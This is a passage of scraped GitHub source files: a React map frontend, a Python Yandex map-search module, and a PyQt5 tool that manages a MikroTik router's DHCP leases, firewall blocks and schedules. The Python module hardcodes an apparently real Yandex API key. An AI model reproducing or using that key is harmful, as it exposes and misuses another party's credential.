className=\"OptionSelection Content\">\n <ul className=\"OptionSelection-NavBar NavBar\">\n {\n props.state.MainPage.options.map((btn, index) => {\n return (\n <Button\n key={index}\n index={index}\n btn={btn.buttonName}\n />\n )\n })\n }\n </ul>\n\n\n <Tags tags={props.state.MainPage.options[props.state.MainPage.active].tags}/>\n\n <div className=\"OptionSelection-Map\">\n <MapFrame active = {props.state.MainPage.active} />\n </div>\n\n\n </div>\n )\n};\n\nexport default connect(\n state =>({\n state:state\n }),\n dispatch => ({\n\n })\n)(OptionSelection);\n" }, { "alpha_fraction": 0.4865073263645172, "alphanum_fraction": 0.4911333918571472, "avg_line_length": 25.97916603088379, "blob_id": "e21634595ec88028e17962046667383bca53cff3", "content_id": "0210015cfb4f218585a34351e7e935a8d9d466e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1490, "license_type": "no_license", "max_line_length": 155, "num_lines": 48, "path": "/src/client/store/initialState.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport {addPoints, selectActive} from \"./reducers/mainPageReducer\";\n\n// fetch('/data', {\n// method: 'POST',\n// body: JSON.stringify({val: index}),\n// })\n// .then((response) => response.json())\n// .then((data) => {\n// console.log(data);\n// let result = data.map((point) => {\n// return {\n// latitude: point[\"coordinates\"][1],\n// longitude: point[\"coordinates\"][0],\n// color: point[\"color\"]\n// }\n// });\n//\n// dispatch(addPoints(result, index));\n// dispatch(selectActive(index));\n//\n// })\n// .catch((error) => console.error(error));\n\nexport const initialState = {\n active: 0,\n text: [\n \"Москва - огромный город для жизни и для развлечений. Только подумать, 12.5 миллионов совершенно разных людей, чьи вкусы и потребности уникальны.\",\n \"Опираясь на отзывы людей из социальных сетей можно разделить районы города на три категории:\"\n ],\n options: [\n {\n buttonName: \"\",\n buttonStatus: \"\",\n tags:[],\n points:[]\n }\n ],\n\n places: [\n {\n title:\"\",\n telNumber:\"\",\n address:\"\",\n link:\"\"\n }\n ]\n};\n\n\n" }, { "alpha_fraction": 0.5512820482254028, "alphanum_fraction": 0.5512820482254028, "avg_line_length": 22.923076629638672, "blob_id": "b2a68a5629d8909dd33f4d16ab0cade5feb75cc3", "content_id": "02174f94775082726d29023ca277e04496d7fc6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 312, "license_type": "no_license", "max_line_length": 59, "num_lines": 13, "path": "/src/client/components/asideWhiteBlock/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./aside.css\"\n\n\nexport const AsideWhiteBlock = (props) => {\n return (\n <div className=\"AsideWhiteBlock Content\">\n <div className=\"AsideWhiteBlock-Text\">\n <span className= \"Text\">{props.text}</span>\n </div>\n </div>\n )\n};\n\n" }, { "alpha_fraction": 0.4369436204433441, "alphanum_fraction": 0.5229970216751099, "avg_line_length": 29.659090042114258, "blob_id": "5183f6935339cb2edb96b93393e6bf7c63036318", "content_id": "26264d8b8dae467683585693cf58bf0d51a67408", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1348, "license_type": "no_license", "max_line_length": 151, "num_lines": 44, "path": "/src/server/app/module.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import requests\nimport json\n\nKEY = \"a84c0a4b-affd-4b46-b010-e1cca5038a86\"\n\nLATITUDE_1 = \"55.92095016773269\"\nLONGITUDE_1 = \"37.94117188864121\"\nLATITUDE_2 = \"55.56626737889634\"\nLONGITUDE_2 = \"37.29587767003522\"\n\nwidth = abs((float(LATITUDE_2) - float(LATITUDE_1)) / 40)\nlong = abs((float(LONGITUDE_2) - float(LONGITUDE_1)) / 40)\n\nres = width * long\n\n\ndef map_point():\n num = 1\n a = float(LATITUDE_2)\n b = float(LONGITUDE_2)\n mass = []\n for w in range(40):\n a += width\n b = float(LONGITUDE_2)\n for h in range(40):\n num += 1\n b += long\n mass.append({\"coordinates\": [b, a], \"sum\": 0, \"color\": \"\"})\n return mass\n\n\ndef fetch(SEARCHING_TEXT):\n map = []\n response = requests.get(\n \"https://search-maps.yandex.ru/v1/?text=\" + SEARCHING_TEXT + \"&type=biz\"\n \"&lang=ru_RU\"\n \"&bbox=\" + LONGITUDE_1 + \",\" + LATITUDE_1 + \"~\" + LONGITUDE_2 + \",\" + LATITUDE_2 +\n \"&results=100000&apikey=\" + KEY)\n\n for i in json.loads(response.content.decode('utf-8'))[\"features\"]:\n map.append({\"coordinates\": i[\"geometry\"][\"coordinates\"],\n \"name\": i[\"properties\"][\"CompanyMetaData\"][\"Categories\"][0][\"name\"]})\n\n return map" }, { "alpha_fraction": 0.6068376302719116, "alphanum_fraction": 0.6136752367019653, "avg_line_length": 22.399999618530273, "blob_id": "3b21f141598da38ca4ddcb1bf85bd82d01b462c7", "content_id": "6136261a01f077c401b972cadf21f3fd134e3bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 585, "license_type": "no_license", "max_line_length": 105, "num_lines": 25, "path": "/src/client/components/textContent/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./textContent.css\";\nimport {AsideGrayBlock} from \"../AsideGrayBlock\";\nimport {connect} from \"react-redux\";\n\n\nconst TextContent = (props) => {\n return (\n <div className=\"Content TextContent\">\n <AsideGrayBlock title={props.state.MainPage.title[1]} text = {props.state.MainPage.text[1]}/>\n <AsideGrayBlock title={props.state.MainPage.title[2]} text = {props.state.MainPage.text[2]}/>\n </div>\n )\n};\n\n\n\nexport default connect(\n state =>({\n state:state\n }),\n dispatch => ({\n\n })\n)(TextContent);\n" }, { "alpha_fraction": 0.525896430015564, "alphanum_fraction": 0.5285524725914001, "avg_line_length": 26.925926208496094, "blob_id": "eed5aa52c6911eefae6bcb48399ca96f8cfb200e", "content_id": "5eb620617fe15b28eccdf2f66e0260a347882022", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 753, "license_type": "no_license", "max_line_length": 70, "num_lines": 27, "path": "/src/client/store/reducers/SetInitState.js", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import {setInitialOptions, setInitialPlaces} from \"./mainPageReducer\";\n\nexport const setInitOptions = () => dispatch => {\n fetch('/init', {\n method: 'POST',\n body: JSON.stringify({val: 1}),\n })\n .then((response) => response.json())\n .then((data) => {\n dispatch(setInitialOptions(data));\n })\n .catch((error) => console.error(error));\n};\n\n\nexport const setInitPlaces = () => dispatch => {\n fetch('/initPlaces', {\n method: 'POST',\n body: JSON.stringify({val: 1}),\n })\n .then((response) => response.json())\n .then((data) => {\n dispatch(setInitialPlaces(data));\n console.log(data)\n })\n .catch((error) => console.error(error));\n};" }, { "alpha_fraction": 0.5147313475608826, "alphanum_fraction": 0.5181975960731506, "avg_line_length": 35.125, "blob_id": "886a7f82796c67445c77f395f13e427e0841293c", "content_id": "57d1d6fcac247f5b23d5595ca7bbb24eb849dff2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 587, "license_type": "no_license", "max_line_length": 103, "num_lines": 16, "path": "/src/client/components/header/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./header.css\";\n\nexport const Header = (props) => {\n return (\n <div className=\"Header Content Content_green\">\n <div className=\"Header-Inner\">\n <h3 className=\"Header-Title\">Info MSK</h3>\n <div className=\"Header-Nav Nav\">\n <div className=\"Nav-Map Map\"><a href=\"#maps\" className = \"Map-Link\">Карты</a></div>\n <div className=\"Nav-Rating\"><a href=\"#Events\" className=\"Nav-Link\">Места</a></div>\n </div>\n </div>\n </div>\n )\n};" } ]
18
evgeniy-p/study
https://github.com/evgeniy-p/study
5f386f8a6530aa23890c490648dfee6febe9fab5
20aa30efbdfbeb88a29d4ab15282cb6a51a60459
e0d528147eab3ab83e836887cb1b8a223d1b9e8f
refs/heads/master
2020-12-03T00:44:37.291064
2019-10-14T11:40:36
2019-10-14T11:40:36
96,076,928
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.4789029657840729, "alphanum_fraction": 0.5042194128036499, "avg_line_length": 45.47058868408203, "blob_id": "4039971fc179fcf14f0641841ee8ac0e4441f294", "content_id": "1de0a38d9e2be101bda51b903e31a1419c3f38ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2370, "license_type": "no_license", "max_line_length": 116, "num_lines": 51, "path": "/scheduler.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import same\nimport logging\nfrom re import match\n\nmonts = {'01': 'Jan', '02': 'Feb', '03': 'Mar', '04': 'Apr', '05': 'May', '06': 'Jun', '07': 'Jul', '08': 'Aug',\n '09': 'Sep', '10': 'Oct', '11': 'Nov', '12': 'Dec'}\n\nmonts_rev = {'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04', 'may': '05', 'jun': '06', 'jul': '07', 'aug': '08',\n 'sep': '09', 'oct': '10', 'nov': '11', 'dec': '12'}\n\n\ndef make_day(input_date):\n day = monts[input_date.split('*')[0]] + '/' + input_date.split('*')[1]\n return day\n\n\nclass Scheduler(same.Same):\n def __init__(self, router):\n super().__init__(router)\n\n def make_sched(self, host, date, interv, method):\n self.make('/system/scheduler/add', '=name={}_'.format(method) + host,\n '=start-date=' + make_day(date), '=start-time=' + date.split('*')[2],\n '=interval=' + interv, '=on-event={}_'.format(method) + host, '=disabled=yes')\n\n def remove_shed(self, host, method):\n shed_id = self.make('/system/scheduler/print', '?name={}_'.format(method) + host)\n if shed_id:\n self.make('/system/scheduler/remove', '=.id=' + shed_id)\n\n def show_shed(self, host, method):\n answer = self.getanswer('/system/scheduler/print', '?name={}_'.format(method) + host)\n logging.debug(answer)\n if \">>> !re\" in answer.split('\\n'):\n for line in answer.split('\\n'):\n if match('^.*start-date=.*', line):\n shed_startd = match('^.*start-date=(.*)', line).group(1)\n if match('^.*start-time=.*', line):\n shed_startt = match('^.*start-time=(.*)', line).group(1)\n if match('^.*interval=.*', line):\n shed_interv = match('^.*interval=(.*)', line).group(1)\n return [int(shed_startd.split('/')[1]), int(monts_rev[shed_startd.split('/')[0]]),\n int(shed_startd.split('/')[2]), int(shed_startt.split(':')[0]),\n int(shed_startt.split(':')[1]), int(shed_startt.split(':')[0])], shed_interv\n else:\n return False, False\n\n def modify_shed(self, host, method, disable='yes'):\n shed_id = self.make('/system/scheduler/print', '?name={}_'.format(method) + host)\n if shed_id:\n self.make('/system/scheduler/set', '=.id=' + shed_id, '=disabled='+disable)\n" }, { "alpha_fraction": 0.6242219805717468, "alphanum_fraction": 0.642704427242279, "avg_line_length": 45.56415939331055, "blob_id": "7600b0923221891caa4194ce583b90197f2d0ea8", "content_id": "7cf6fbc54a9f8efd40350674d766ffed27138ad8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21809, "license_type": "no_license", "max_line_length": 120, "num_lines": 452, "path": "/MAIN.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import sys\nimport mainwin\nimport but1\nimport logs\nimport message\nimport mikr_api\nimport conf\nimport sys\nimport io\nimport dhcp_hosts\nimport filter\nimport scirpt\nimport scheduler\nimport sched_but\nimport logging\nfrom contextlib import redirect_stdout\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5 import QtCore\n\n\nclass MainWindow:\n def __init__(self):\n self.app = QApplication(sys.argv)\n # Окно кнопки 3 (logger)\n self.uibut3 = logs.Ui_Form()\n self.windowbut3 = QMainWindow()\n self.windowbut3.move(700, 600)\n self.uibut3.setupUi(self.windowbut3)\n # logger conf\n self.logger = logging.getLogger(__name__)\n self.gui = logging.StreamHandler(Writer(self.uibut3))\n self.logfile = logging.FileHandler('mikrotik.log')\n self.logger.addHandler(self.gui)\n self.logger.addHandler(self.logfile)\n # Соединение с mikrotik\n self.s = None\n self.router = None\n self.start_connect()\n self.login()\n self.logger.debug(' Запускаем главное окно, передаем список хостов')\n # обращаемся к классу, по которому можно получить список хостов, а также задать статику и т.п\n self.router_hosts = dhcp_hosts.DhcpHosts(self.router)\n self.hosts_dict = self.router_hosts.hosts\n # обращаемся к классу, по которому можно создать\\удалить правило в firewall\n self.router_filter = filter.Filter(self.router)\n # Обращаемся к классу, по работе с скриптами\n self.wwscript = scirpt.Scripts(self.router)\n # Обращаемся к классу по работе с расписанием\n self.scheduler = scheduler.Scheduler(self.router)\n # Главное окно\n self.Mui = mainwin.Ui_MainWindow()\n self.Mwindow = QMainWindow()\n self.Mwindow.move(300, 300)\n self.Mui.setupUi(self.Mwindow)\n self.Mui.pushButton.clicked.connect(self.button1)\n self.Mui.pushButton_3.clicked.connect(self.button3)\n self.Mui.pushButton_4.clicked.connect(self.refresh)\n # Окно кнопки 1\n self.uibut1 = but1.Ui_Form()\n self.windowbut1 = QMainWindow()\n self.uibut1.setupUi(self.windowbut1)\n self.uibut1.pushButton.clicked.connect(self.pushbuttonbut1_1)\n self.uibut1.pushButton_2.clicked.connect(self.pushbuttonbut1_2)\n self.uibut1.pushButton_3.clicked.connect(self.pushbuttonbut1_3)\n self.uibut1.pushButton_4.clicked.connect(self.pushbuttonbut1_4)\n # Окно кнопки 2(1-4) (расписание)\n self.uibut2 = but1.Ui_Form()\n self.windowbut2 = QMainWindow()\n self.uibut2.setupUi(self.windowbut2)\n self.uibut2.pushButton.clicked.connect(self.pushbuttonbut2_1)\n self.uibut2.pushButton_2.clicked.connect(self.pushbuttonbut2_2)\n self.uibut2.pushButton_3.clicked.connect(self.pushbuttonbut2_3)\n self.uibut2.pushButton_4.clicked.connect(self.pushbuttonbut2_4)\n self.uibut2.pushButton_2.setDisabled(True)\n self.uibut2.pushButton_3.setDisabled(True)\n self.uibut2.pushButton_4.setDisabled(True)\n # Окно сообщения об ошибке\n self.uimessage = message.Ui_Form()\n self.windowmessage = QMainWindow()\n self.windowmessage.move(500, 500)\n self.uimessage.setupUi(self.windowmessage)\n # Окно кнопки sched_but\n self.uished_but = sched_but.Ui_Form()\n self.windowshed_but = QMainWindow()\n self.windowshed_but.move(1000, 300)\n self.uished_but.setupUi(self.windowshed_but)\n self.uished_but.dateTimeEdit_2.setDisabled(True)\n self.uished_but.dateTimeEdit_4.setDisabled(True)\n self.uished_but.label_2.setDisabled(True)\n self.uished_but.label_5.setDisabled(True)\n self.uished_but.label_6.setDisabled(True)\n self.uished_but.radioButton_4.checkStateSet()\n self.uished_but.radioButton_4.setDisabled(True)\n self.uished_but.radioButton_5.setDisabled(True)\n self.uished_but.radioButton_6.setDisabled(True)\n self.uished_but.radioButton.setChecked(True)\n self.uished_but.radioButton_6.setChecked(True)\n self.time_disabeled_2 = True\n self.uished_but.pushButton_2.clicked.connect(self.set_en_2)\n self.date_en = False\n self.interval_en = False\n self.date_dis = False\n self.date_en2 = False\n self.date_dis2 = False\n self.interval_en2 = False\n\n def set_en_2(self):\n if self.time_disabeled_2:\n self.uished_but.label_2.setDisabled(False)\n self.uished_but.label_5.setDisabled(False)\n self.uished_but.label_6.setDisabled(False)\n self.uished_but.radioButton_4.setDisabled(False)\n self.uished_but.radioButton_5.setDisabled(False)\n self.uished_but.radioButton_6.setDisabled(False)\n self.uished_but.pushButton_2.setText('-')\n self.uished_but.dateTimeEdit_2.setDisabled(False)\n self.uished_but.dateTimeEdit_4.setDisabled(False)\n self.time_disabeled_2 = False\n else:\n self.uished_but.label_2.setDisabled(True)\n self.uished_but.label_5.setDisabled(True)\n self.uished_but.label_6.setDisabled(True)\n self.uished_but.radioButton_4.setDisabled(True)\n self.uished_but.radioButton_5.setDisabled(True)\n self.uished_but.radioButton_6.setDisabled(True)\n self.uished_but.pushButton_2.setText('+')\n self.uished_but.dateTimeEdit_2.setDisabled(True)\n self.uished_but.dateTimeEdit_4.setDisabled(True)\n self.time_disabeled_2= True\n\n def start_connect(self):\n self.s = mikr_api.main(conf.r1_ipaddr)\n if not self.s:\n self.uimessage.label.setText('Нет соединения!!!!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.close)\n self.windowmessage.show()\n self.logger.critical(' Соединение с mikrotik не установилась!')\n sys.exit(self.app.exec_())\n self.router = mikr_api.ApiRos(self.s)\n self.logger.debug(' Соединение по сети прошло успешно')\n\n def login(self):\n self.logger.debug(' Попытка логина (авторизация)....')\n with io.StringIO() as buf, redirect_stdout(buf):\n try:\n self.router.login(conf.r1_login, conf.r1_passwd1)\n except AttributeError:\n self.uimessage.label.setText(' Не авторизован!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.close)\n self.windowmessage.show()\n sys.exit(self.app.exec_())\n sys.exit()\n output = buf.getvalue()\n if \">>> =message=cannot log in\" in output.split('\\n'):\n self.logger.critical(' Логин или пароль не верен!')\n self.uimessage.label.setText(' Не авторизован!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.close)\n self.windowmessage.show()\n sys.exit(self.app.exec_())\n sys.exit()\n self.logger.debug(' Логин прошел успешно')\n\n def set_combo_box(self):\n self.Mui.comboBox.clear()\n self.Mui.comboBox.addItem('None')\n for host in self.hosts_dict:\n self.Mui.comboBox.addItem(self.hosts_dict[host]['host-name'])\n\n def run(self):\n self.set_combo_box()\n self.logger.debug('заполняем выпадающий список')\n self.Mwindow.show()\n sys.exit(self.app.exec_())\n\n def button1(self):\n self.Mui.comboBox.close()\n self.Mui.label.setText('Выбран хост:')\n self.Mui.label_2.setText(self.Mui.comboBox.currentText())\n if self.Mui.comboBox.currentText() == 'None':\n if self.windowbut1:\n self.windowbut1.hide()\n self.logger.debug(' host- none- warning')\n self.uimessage.label.setText(' ВЫБЕРИТЕ ХОСТ!!!\\nЕсли хостов нет -\\nпопробуйте\\n'\n 'переподключить\\nустройство к сети!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.hide)\n self.windowmessage.show()\n return\n self.windowbut1.move(700, 300)\n self.windowbut2.close()\n if self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'block'):\n self.dynamic()\n self.uibut1.pushButton_2.setText(\"unblock inet\")\n self.uibut1.pushButton_3.setDisabled(True)\n self.uibut1.pushButton_4.setDisabled(True)\n elif self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'sched'):\n self.uibut1.pushButton.setDisabled(True)\n self.uibut1.pushButton_2.setDisabled(True)\n self.uibut1.pushButton_3.setDisabled(True)\n self.uibut1.pushButton_4.setDisabled(False)\n else:\n self.uibut1.pushButton_2.setText(\"block inet\")\n self.uibut1.pushButton_3.setDisabled(False)\n self.uibut1.pushButton_4.setDisabled(False)\n self.dynamic()\n if self.windowmessage:\n self.windowmessage.hide()\n self.logger.debug('modify \"' + self.Mui.comboBox.currentText() + '\" host')\n self.windowbut1.setWindowTitle(self.Mui.comboBox.currentText())\n self.uibut1.hostname = self.Mui.comboBox.currentText()\n self.windowbut1.show()\n\n def dynamic(self):\n try:\n if self.hosts_dict[self.Mui.comboBox.currentText()]['dynamic'] == 'false':\n self.uibut1.pushButton.setText('already static')\n self.uibut1.pushButton.setDisabled(True)\n self.uibut1.pushButton_3.setDisabled(False)\n self.uibut1.pushButton_2.setDisabled(False)\n self.uibut1.pushButton_4.setDisabled(False)\n else:\n self.uibut1.pushButton_4.setDisabled(True)\n self.uibut1.pushButton.setText('make static')\n self.uibut1.pushButton_2.setDisabled(True)\n self.uibut1.pushButton.setDisabled(False)\n self.uibut1.pushButton_3.setDisabled(True)\n except KeyError:\n self.no_shuch_host()\n\n def button3(self):\n self.logger.debug('\"Логи\"')\n if self.windowmessage:\n self.windowmessage.hide()\n if self.windowbut1:\n self.windowbut1.hide()\n self.windowbut3.show()\n\n def pushbuttonbut1_1(self):\n self.logger.debug('make static \"' + self.Mui.comboBox.currentText() + '\" host')\n self.router_hosts.make_static(self.Mui.comboBox.currentText())\n self.start_connect()\n self.login()\n self.router_hosts = dhcp_hosts.DhcpHosts(self.router)\n self.hosts_dict = self.router_hosts.hosts\n self.dynamic()\n\n def pushbuttonbut1_2(self):\n self.windowbut1.close()\n self.windowshed_but.close()\n self.router_filter = filter.Filter(self.router)\n if self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'sched'):\n self.uibut1.pushButton_2.setDisabled(True)\n self.uibut1.pushButton_3.setDisabled(True)\n else:\n self.buttonbut1_2()\n\n def buttonbut1_2(self):\n if self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'block'):\n self.logger.debug('turn on internet \"' + self.Mui.comboBox.currentText() + '\" enable host in firewall')\n self.router_filter.delete_rule(self.Mui.comboBox.currentText(), 'block')\n self.uibut1.pushButton_2.setText(\"block inet\")\n self.uibut1.pushButton_3.setDisabled(False)\n self.uibut1.pushButton_4.setDisabled(False)\n else:\n self.logger.debug('turn off internet \"' + self.Mui.comboBox.currentText() + '\" disable host in firewall')\n self.router_filter.forwardblock(self.Mui.comboBox.currentText(), 'block')\n self.uibut1.pushButton_2.setText(\"unblock inet\")\n self.uibut1.pushButton_3.setDisabled(True)\n self.uibut1.pushButton_4.setDisabled(True)\n\n def pushbuttonbut1_3(self):\n self.windowbut1.hide()\n self.logger.debug('remove static lease host \"' + self.Mui.comboBox.currentText() + '\"')\n self.router_hosts.remove_static(self.Mui.comboBox.currentText())\n self.refresh()\n self.uimessage.label.setText('Удалено!\\nНужно будет\\nпереподключить\\nустройства к сети'\n '\\nдля дальнейшей\\nработы!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.hide)\n self.windowmessage.show()\n\n def pushbuttonbut1_4(self):\n self.windowbut2.move(800, 300)\n self.windowbut2.setWindowTitle('Расписание')\n self.uibut2.pushButton.setText('Настроить')\n if self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'sched'):\n self.logger.debug('Правила в firewall уже созданы')\n self.uibut2.pushButton_2.setDisabled(False)\n self.uibut2.pushButton_3.setDisabled(True)\n self.uibut2.pushButton_4.setDisabled(False)\n self.uibut2.pushButton_2.setText(\"Включить\")\n self.uibut2.pushButton_3.setText(\"Выключить\")\n self.uibut2.pushButton_4.setText('Удалить')\n self.windowbut1.close()\n self.windowbut2.show()\n\n def pushbuttonbut2_1(self):\n self.uished_but.pushButton.clicked.connect(self.set_time)\n self.date_en, self.date_dis, self.interval_en = self.show_current_sched_rules('Enable_1', 'Disable_1')\n self.date_en2, self.date_dis2, self.interval_en2 = self.show_current_sched_rules('Enable_2', 'Disable_2')\n if self.date_en:\n self.get_time(self.date_en, self.date_dis, self.uished_but.dateTimeEdit, self.uished_but.dateTimeEdit_3)\n if self.date_en2:\n self.get_time(self.date_en2, self.date_dis2, self.uished_but.dateTimeEdit_2, self.uished_but.dateTimeEdit_4)\n self.set_rbut(self.uished_but.radioButton, self.uished_but.radioButton_2, self.uished_but.radioButton_3,\n self.interval_en)\n self.set_rbut(self.uished_but.radioButton_6, self.uished_but.radioButton_5, self.uished_but.radioButton_4,\n self.interval_en2)\n self.windowshed_but.show()\n\n def show_current_sched_rules(self, first, second):\n date_en, interval = self.scheduler.show_shed(self.Mui.comboBox.currentText(), first)\n date_dis, interval = self.scheduler.show_shed(self.Mui.comboBox.currentText(), second)\n return date_en, date_dis, interval\n\n def get_time(self, de, dd, qdt1, qdt2):\n date_enable = QtCore.QDateTime(QtCore.QDate(de[2], de[1], de[0]), QtCore.QTime(de[3], de[4], de[5]))\n date_disable = QtCore.QDateTime(QtCore.QDate(dd[2], dd[1], dd[0]), QtCore.QTime(dd[3], dd[4], dd[5]))\n qdt1.setDateTime(date_enable)\n qdt2.setDateTime(date_disable)\n\n def set_rbut(self, but1, but2, but3, interval):\n if interval == '1d':\n but1.setChecked(True)\n elif interval == '1w':\n but2.setChecked(True)\n else:\n but3.setChecked(True)\n\n def set_time(self):\n self.Mui.pushButton.setText('wait...')\n self.Mui.pushButton.setDisabled(True)\n self.windowbut2.close()\n self.windowshed_but.close()\n QtCore.QTimer.singleShot(4000, self.unhide)\n if not self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'sched'):\n self.router_filter.forwardblock(self.Mui.comboBox.currentText(), 'sched')\n self.router_filter.disable_rule(self.Mui.comboBox.currentText(), 'sched')\n self.uibut2.pushButton.setDisabled(True)\n self.uibut2.pushButton_2.setDisabled(False)\n self.uibut2.pushButton_3.setDisabled(True)\n self.uibut2.pushButton_4.setDisabled(False)\n if self.date_en:\n self.delete_old_rules('Enable_1', 'Disable_1')\n if self.date_en2:\n self.delete_old_rules('Enable_2', 'Disable_2')\n self.init_script('Enable_1', 'Disable_1')\n self.date_en = self.uished_but.dateTimeEdit.dateTime().toString(format('MM*dd/yyyy*hh:mm:ss'))\n self.date_dis = self.uished_but.dateTimeEdit_3.dateTime().toString(format('MM*dd/yyyy*hh:mm:ss'))\n self.interval_en = self.check_button(self.uished_but.radioButton, self.uished_but.radioButton_2)\n self.scheduler.make_sched(self.Mui.comboBox.currentText(), self.date_en, self.interval_en, 'Enable_1')\n self.scheduler.make_sched(self.Mui.comboBox.currentText(), self.date_dis, self.interval_en, 'Disable_1')\n if not self.time_disabeled_2:\n self.init_script('Enable_2', 'Disable_2')\n self.date_en2 = self.uished_but.dateTimeEdit_2.dateTime().toString(format('MM*dd/yyyy*hh:mm:ss'))\n self.date_dis2 = self.uished_but.dateTimeEdit_4.dateTime().toString(format('MM*dd/yyyy*hh:mm:ss'))\n self.interval_en2 = self.check_button(self.uished_but.radioButton_6, self.uished_but.radioButton_5)\n self.scheduler.make_sched(self.Mui.comboBox.currentText(), self.date_en2, self.interval_en2, 'Enable_2')\n self.scheduler.make_sched(self.Mui.comboBox.currentText(), self.date_dis2, self.interval_en2, 'Disable_2')\n\n def unhide(self):\n self.Mui.pushButton.setText('Изменить')\n self.Mui.pushButton.setDisabled(False)\n self.uibut2.pushButton.setText('Настроить')\n self.uibut2.pushButton.setDisabled(False)\n\n def init_script(self, first, second):\n if not self.wwscript.script_is_here(self.Mui.comboBox.currentText(), first):\n self.wwscript.make_script(self.Mui.comboBox.currentText(),\n self.hosts_dict[self.Mui.comboBox.currentText()]['address'], first, 'no')\n self.wwscript.make_script(self.Mui.comboBox.currentText(),\n self.hosts_dict[self.Mui.comboBox.currentText()]['address'], second, 'yes')\n\n def delete_old_rules(self, first, second):\n self.scheduler.remove_shed(self.Mui.comboBox.currentText(), first)\n self.scheduler.remove_shed(self.Mui.comboBox.currentText(), second)\n self.wwscript.remove_script(self.Mui.comboBox.currentText(), first)\n self.wwscript.remove_script(self.Mui.comboBox.currentText(), second)\n\n def check_button(self, rbut1, rbut2):\n if rbut1.isChecked():\n interval = '1d 00:00:00'\n elif rbut2.isChecked():\n interval = '7d 00:00:00'\n else:\n interval = '365d 00:00:00'\n return interval\n\n def pushbuttonbut2_2(self):\n self.change_stat('no')\n self.uibut2.pushButton_2.setDisabled(True)\n self.uibut2.pushButton_3.setDisabled(False)\n\n def change_stat(self, disable='yes'):\n self.scheduler.modify_shed(self.Mui.comboBox.currentText(), 'Enable_1', disable)\n self.scheduler.modify_shed(self.Mui.comboBox.currentText(), 'Disable_1', disable)\n self.scheduler.modify_shed(self.Mui.comboBox.currentText(), 'Enable_2', disable)\n self.scheduler.modify_shed(self.Mui.comboBox.currentText(), 'Disable_2', disable)\n\n def pushbuttonbut2_3(self):\n self.change_stat()\n self.uibut2.pushButton_2.setDisabled(False)\n self.uibut2.pushButton_3.setDisabled(True)\n\n def pushbuttonbut2_4(self):\n self.windowshed_but.close()\n self.uibut2.pushButton.setText('wait...')\n self.uibut2.pushButton.setDisabled(True)\n self.Mui.pushButton.setText('wait...')\n self.Mui.pushButton.setDisabled(True)\n QtCore.QTimer.singleShot(4000, self.unhide)\n self.delete_old_rules('Enable_1', 'Disable_1')\n self.delete_old_rules('Enable_2', 'Disable_2')\n self.router_filter.delete_rule(self.Mui.comboBox.currentText(), 'sched')\n self.uibut2.pushButton_2.setDisabled(True)\n self.uibut2.pushButton_3.setDisabled(True)\n self.uibut2.pushButton_4.setDisabled(True)\n\n def refresh(self):\n self.logger.debug(' refresh button pressed')\n self.logger.debug(' Restart')\n self.Mui.comboBox.clear()\n self.Mui.label_2.setText('')\n self.Mui.label.setText('Выберите хост:')\n self.Mui.comboBox.show()\n self.start_connect()\n self.login()\n self.router_hosts = dhcp_hosts.DhcpHosts(self.router)\n self.hosts_dict = self.router_hosts.hosts\n self.set_combo_box()\n self.windowbut1.close()\n self.windowbut2.close()\n self.windowbut3.close()\n self.windowshed_but.close()\n\n def no_shuch_host(self):\n self.uimessage.label.setText('Нажмите \"Обновить\"')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.close)\n self.windowmessage.show()\n\n\nclass Writer:\n def __init__(self, widget):\n self.widget = widget\n\n def write(self, text):\n self.widget.textBrowser.appendPlainText(text)\n\n\nif __name__ == '__main__':\n logging.basicConfig(filename='mikrotik.log', filemode='w', level=logging.DEBUG, format='%(asctime)s %(message)s')\n logging.debug(' Start')\n widget = MainWindow()\n widget.run()\n" }, { "alpha_fraction": 0.6664080619812012, "alphanum_fraction": 0.7001551389694214, "avg_line_length": 47.60377502441406, "blob_id": "a152478d7c72a4b79c44ca6df1bd0dabb95d26e9", "content_id": "6f491055c3142a9294229f247663a37cbf0a4270", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2622, "license_type": "no_license", "max_line_length": 85, "num_lines": 53, "path": "/mainwin.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'untilted.ui'\n#\n# Created by: PyQt5 UI code generator 5.5.1\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtWidgets\n\nclass Ui_MainWindow(object):\n def setupUi(self, 